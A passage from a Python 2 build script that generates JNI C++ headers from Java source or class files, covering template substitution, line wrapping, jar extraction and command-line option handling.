base::android::MethodID::LazyGet<
base::android::MethodID::TYPE_${STATIC}>(
env, g_${JAVA_CLASS}_clazz,
"${JNI_NAME}",
${JNI_SIGNATURE},
&g_${JAVA_CLASS}_${METHOD_ID_VAR_NAME});
""")
jni_name = called_by_native.name
jni_return_type = called_by_native.return_type
if called_by_native.is_constructor:
jni_name = '<init>'
jni_return_type = 'void'
if called_by_native.signature:
signature = called_by_native.signature
else:
signature = JniParams.Signature(called_by_native.params,
jni_return_type,
True)
values = {
'JAVA_CLASS': called_by_native.java_class_name or self.class_name,
'JNI_NAME': jni_name,
'METHOD_ID_VAR_NAME': called_by_native.method_id_var_name,
'STATIC': 'STATIC' if called_by_native.static else 'INSTANCE',
'JNI_SIGNATURE': signature,
}
return template.substitute(values)
def WrapOutput(output):
ret = []
for line in output.splitlines():
# Do not wrap lines under 80 characters or preprocessor directives.
if len(line) < 80 or line.lstrip()[:1] == '#':
stripped = line.rstrip()
if len(ret) == 0 or len(ret[-1]) or len(stripped):
ret.append(stripped)
else:
first_line_indent = ' ' * (len(line) - len(line.lstrip()))
subsequent_indent = first_line_indent + ' ' * 4
if line.startswith('//'):
subsequent_indent = '//' + subsequent_indent
wrapper = textwrap.TextWrapper(width=80,
subsequent_indent=subsequent_indent,
break_long_words=False)
ret += [wrapped.rstrip() for wrapped in wrapper.wrap(line)]
ret += ['']
return '\n'.join(ret)
def ExtractJarInputFile(jar_file, input_file, out_dir):
"""Extracts input file from jar and returns the filename.
The input file is extracted to the same directory that the generated jni
headers will be placed in. This is passed as an argument to script.
Args:
jar_file: the jar file containing the input files to extract.
input_files: the list of files to extract from the jar file.
out_dir: the name of the directories to extract to.
Returns:
the name of extracted input file.
"""
jar_file = zipfile.ZipFile(jar_file)
out_dir = os.path.join(out_dir, os.path.dirname(input_file))
try:
os.makedirs(out_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
extracted_file_name = os.path.join(out_dir, os.path.basename(input_file))
with open(extracted_file_name, 'w') as outfile:
outfile.write(jar_file.read(input_file))
return extracted_file_name
def GenerateJNIHeader(input_file, output_file, options):
try:
if os.path.splitext(input_file)[1] == '.class':
jni_from_javap = JNIFromJavaP.CreateFromClass(input_file, options)
content = jni_from_javap.GetContent()
else:
jni_from_java_source = JNIFromJavaSource.CreateFromFile(
input_file, options)
content = jni_from_java_source.GetContent()
except ParseError, e:
print e
sys.exit(1)
if output_file:
if not os.path.exists(os.path.dirname(os.path.abspath(output_file))):
os.makedirs(os.path.dirname(os.path.abspath(output_file)))
if options.optimize_generation and os.path.exists(output_file):
with file(output_file, 'r') as f:
existing_content = f.read()
if existing_content == content:
return
with file(output_file, 'w') as f:
f.write(content)
else:
print output
def GetScriptName():
script_components = os.path.abspath(sys.argv[0]).split(os.path.sep)
base_index = 0
for idx, value in enumerate(script_components):
if value == 'base' or value == 'third_party':
base_index = idx
break
return os.sep.join(script_components[base_index:])
def main(argv):
usage = """usage: %prog [OPTIONS]
This script will parse the given java source code extracting the native
declarations and print the header file to stdout (or a file).
See SampleForTests.java for more details.
"""
option_parser = optparse.OptionParser(usage=usage)
option_parser.add_option('-j', dest='jar_file',
help='Extract the list of input files from'
' a specified jar file.'
' Uses javap to extract the methods from a'
' pre-compiled class. --input should point'
' to pre-compiled Java .class files.')
option_parser.add_option('-n', dest='namespace',
help='Uses as a namespace in the generated header,'
' instead of the javap class name.')
option_parser.add_option('--input_file',
help='Single input file name. The output file name '
'will be derived from it. Must be used with '
'--output_dir.')
option_parser.add_option('--output_dir',
help='The output directory. Must be used with '
'--input')
option_parser.add_option('--optimize_generation', type="int",
default=0, help='Whether we should optimize JNI '
'generation by not regenerating files if they have '
'not changed.')
option_parser.add_option('--jarjar',
help='Path to optional jarjar rules file.')
option_parser.add_option('--script_name', default=GetScriptName(),
help='The name of this script in the generated '
'header.')
option_parser.add_option('--ptr_type', default='int',
type='choice', choices=['int', 'long'],
help='The type used to represent native pointers in '
'Java code. For 32-bit, use int; '
'for 64-bit, use long.')
options, args = option_parser.parse_args(argv)
if options.jar_file:
input_file = ExtractJarInputFile(options.jar_file, options.input_file,
options.output_dir)
elif options.input_file:
input_file = options.input_file
else:
option_parser.print_help()
print '\nError: Must specify --jar_file or --input_file.'
return 1
output_file = None
if options.output_dir:
root_name = os.path.splitext(os.path.basename(input_file))[0]
output_file = os.path.join(options.output_dir, root_name) + '_jni.h'
if options.jarjar:
with open(options.jarjar) as f:
JniParams.SetJarJarMappings(f.read())
GenerateJNIHeader(input_file, output_file, options)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause |